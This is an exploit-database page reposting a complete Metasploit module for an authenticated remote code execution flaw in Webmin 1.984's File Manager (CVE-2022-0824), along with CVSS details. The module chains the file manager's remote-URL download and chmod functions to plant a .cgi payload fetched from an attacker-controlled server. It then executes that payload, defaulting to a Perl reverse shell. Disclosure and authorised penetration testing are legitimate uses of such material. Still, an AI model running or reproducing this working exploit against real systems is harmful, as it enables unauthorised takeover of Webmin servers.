Webmin 1.984 File Manager Remote Code Execution

2022.11.02
Credit: jheysel-r7
Risk: High
Local: No
Remote: Yes
CWE: CWE-863


CVSS Base Score: 9/10
Impact Subscore: 10/10
Exploitability Subscore: 8/10
Exploit range: Remote
Attack complexity: Low
Authentication: Single time
Confidentiality impact: Complete
Integrity impact: Complete
Availability impact: Complete

## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::FileDropper include Msf::Exploit::Remote::HttpClient include Msf::Exploit::Remote::HttpServer include Msf::Exploit::Remote::HTTP::Webmin prepend Msf::Exploit::Remote::AutoCheck def initialize(info = {}) super( update_info( info, 'Name' => 'Webmin File Manager RCE', 'Description' => %q{ In Webmin version 1.984, any authenticated low privilege user without access rights to the File Manager module could interact with file manager functionalities such as downloading files from remote URLs and changing file permissions. It is possible to achieve Remote Code Execution via a crafted .cgi file by chaining those functionalities in the file manager. }, 'Author' => [ 'faisalfs10x', # discovery 'jheysel-r7' # module ], 'References' => [ [ 'URL', 'https://huntr.dev/bounties/d0049a96-de90-4b1a-9111-94de1044f295/'], # exploit [ 'URL', 'https://github.com/faisalfs10x/Webmin-CVE-2022-0824-revshell'], # exploit [ 'CVE', '2022-0824'] ], 'License' => MSF_LICENSE, 'Platform' => 'linux', 'Privileged' => true, 'Targets' => [ [ 'Automatic (Unix In-Memory)', { 'Platform' => 'unix', 'Arch' => ARCH_CMD, 'Type' => :unix_memory, 'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse_perl' } } ] ], 'DefaultTarget' => 0, 'DisclosureDate' => '2022-02-26', 'Notes' => { 'Stability' => [CRASH_SAFE], 'Reliability' => [REPEATABLE_SESSION], 'SideEffects' => [IOC_IN_LOGS] } ) ) register_options( [ OptPort.new('RPORT', [true, 'The default webmin port', 10000]), OptString.new('USERNAME', [ true, 'The username to authenticate as', '' ]), OptString.new('PASSWORD', [ true, 'The password for the specified username', '' ]) ] ) end def check webmin_check('0', '1.984') end def login webmin_login(datastore['USERNAME'], datastore['PASSWORD']) end def download_remote_url print_status('Fetching payload from HTTP server') res = send_request_cgi({ 'uri' => normalize_uri(datastore['TARGETURI'], '/extensions/file-manager/http_download.cgi'), 'method' => 'POST', 'keep_cookies' => true, 'data' => 'link=' + get_uri + '.cgi' + '&username=&password=&path=%2Fusr%2Fshare%2Fwebmin', 'headers' => { 'Accept' => 'application/json, text/javascript, */*; q=0.01', 'Accept-Encoding' => 'gzip, deflate', 'Content-Type' => 'application/x-www-form-urlencoded; charset=UTF-8', 'X-Requested-With' => 'XMLHttpRequest', 'Referer' => 'http://' + datastore['RHOSTS'] + ':' + datastore['RPORT'].to_s + '/filemin/?xnavigation=1' }, 'vars_get' => { 'module' => 'filemin' } }) fail_with(Failure::UnexpectedReply, 'Unable to download .cgi payload from http server') unless res fail_with(Failure::BadConfig, 'please properly configure the http server, it could not be found by webmin') if res.body.include?('Error: No valid URL supplied!') register_file_for_cleanup("/usr/share/webmin/#{@file_name}") end def modify_permissions print_status('Modifying the permissions of the uploaded payload to 0755') res = send_request_cgi({ 'uri' => normalize_uri(target_uri.path, '/extensions/file-manager/chmod.cgi'), 'method' => 'POST', 'keep_cookies' => true, 'headers' => { 'Referer' => 'http://' + datastore['RHOSTS'] + ':' + datastore['RPORT'].to_s + 'filemin/?xnavigation=1' }, 'vars_get' => { 'module' => 'filemin', 'page' => '1', 'paginate' => '30' }, 'vars_post' => { 'name' => @file_name, 'perms' => '0755', 'applyto' => '1', 'path' => '/usr/share/webmin' } }) fail_with(Failure::UnexpectedReply, 'Unable to modify permissions on the upload .cgi payload') unless res && res.code == 302 end def exec_revshell res = send_request_cgi( 'method' => 'GET', 'keep_cookies' => true, 'uri' => normalize_uri(datastore['TARGETURI'], @file_name), 'headers' => { 'Connection' => 'keep-alive' } ) fail_with(Failure::UnexpectedReply, 'Unable to execute the .cgi payload') unless res && res.code == 500 end def on_request_uri(cli, request) print_status("Request '#{request.method} #{request.uri}'") print_status('Sending payload ...') send_response(cli, payload.encoded, 'Content-Type' => 'application/octet-stream') end def exploit start_service @file_name = (get_resource.gsub('/', '') + '.cgi') cookie = login fail_with(Failure::BadConfig, 'Unsuccessful login attempt with creds') if cookie.empty? print_status('Downloading remote url') download_remote_url print_status('Finished downloading remote url') modify_permissions exec_revshell end end


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2022, cxsecurity.com

 

Back to Top